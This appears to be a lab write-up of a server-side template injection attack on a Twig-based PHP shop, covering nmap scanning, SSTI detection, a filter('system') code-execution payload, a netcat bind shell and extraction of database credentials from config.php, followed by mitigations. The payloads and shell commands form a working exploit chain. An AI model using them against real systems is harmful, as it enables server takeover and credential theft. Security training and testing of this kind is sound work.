Server-Side Template Injection – Remote Code Execution & Data Exposure | Leaf
Overview
This lab demonstrates how Server-Side Template Injection (SSTI) can lead to full server compromise.
The attack chain includes:
- SSTI detection
- Template engine identification
- Remote command execution
- Bind shell access
- Sensitive data extraction
Objective
- Identify SSTI vulnerability
- Determine template engine
- Execute system commands
- Establish shell access
- Extract sensitive information
Reconnaissance
Scan the target for open services:
1
nmap -sV <target_ip>
Output
1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[/home/kelvin/Desktop]
└─# nmap -sV 172.20.6.12
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-29 12:06 -0400
Nmap scan report for 172.20.6.12 (172.20.6.12)
Host is up (0.21s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 ((Debian))
3306/tcp open mysql MySQL (unauthorized)
Nmap done: 1 IP address (1 host up) scanned in 21.37 seconds
Open services:
- Port 80 — HTTP (Apache)
- Port 3306 — MySQL
Initial Enumeration
Directory brute-forcing did not reveal useful endpoints:
1
gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirb/big.txt
However, the web application allows unauthenticated user comments on products.
SSTI Detection
Test for SSTI using a simple payload:
1
{{7*7}}
Result
1
49
This confirms that user input is being evaluated by a template engine.
Template Engine Identification
Test behavior with string multiplication:
1
{{7*'7'}}
Result
1
49
Analysis
| Engine | Expected Output |
|---|---|
| Jinja2 | 7777777 |
| Twig | 49 |
Since the result is 49, the application is using Twig.
Remote Code Execution via SSTI
Twig allows execution of system commands using filters.
Payload
1
{{['<command>']|filter('system')}}
This enables execution of arbitrary commands on the server.
Bind Shell Setup
Start a bind shell on the target:
1
{{['nc -nvlp 1337 -e /bin/bash']|filter('system')}}
Netcat Options
| Flag | Description |
|---|---|
-l | Listen mode |
-v | Verbose |
-n | No DNS resolution |
-p | Port number |
Shell Access
Connect from attacker machine:
1
nc -nv <target_ip> 1337
Result
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
(UNKNOWN) [172.20.6.12] 1337 (?) open
ls
Chart.bundle.min.js
blank.png
bootstrap-icons.css
bundle.min.js
comment.php
composer.json
composer.lock
config.php
css
index.php
js
product.php
products
vendor
Sensitive Data Extraction
Inspect configuration file:
1
cat config.php
Output
1
2
3
4
$host = "localhost";
$dbname = "modish_tech";
$username = "root";
$password = "7tRy-zSmF-1143";
Proof of Exploitation
- SSTI vulnerability identified
- Template engine confirmed as Twig
- Remote command execution achieved
- Bind shell established
- Sensitive database credentials extracted
Attack Chain Summary
- Service enumeration (Nmap)
- Identify input point (comments)
- SSTI detection (
{{7*7}}) - Template engine fingerprinting (Twig)
- Command execution via SSTI
- Bind shell creation (Netcat)
- Remote shell access
- Credential extraction (
config.php)
Impact
- Remote Code Execution (RCE)
- Full server access via shell
- Exposure of database credentials
- Potential database compromise
- High risk of complete system takeover
Mitigation
- Avoid rendering unsanitized user input in templates
- Use safe template rendering practices
- Disable dangerous functions/filters (like
system) - Apply strict input validation and escaping
- Use sandboxed template environments
- Restrict outbound and inbound network access
Real-World Insight
SSTI is one of the most dangerous web vulnerabilities because it directly leads to server-side execution.
Common exploitation path:
Input field → SSTI → RCE → Shell → Data exfiltration
Unlike client-side issues, SSTI gives attackers control over the backend itself.
Always test:
{{7*7}}{{7*'7'}}- Template-specific payloads
A single overlooked input field can lead to full infrastructure compromise.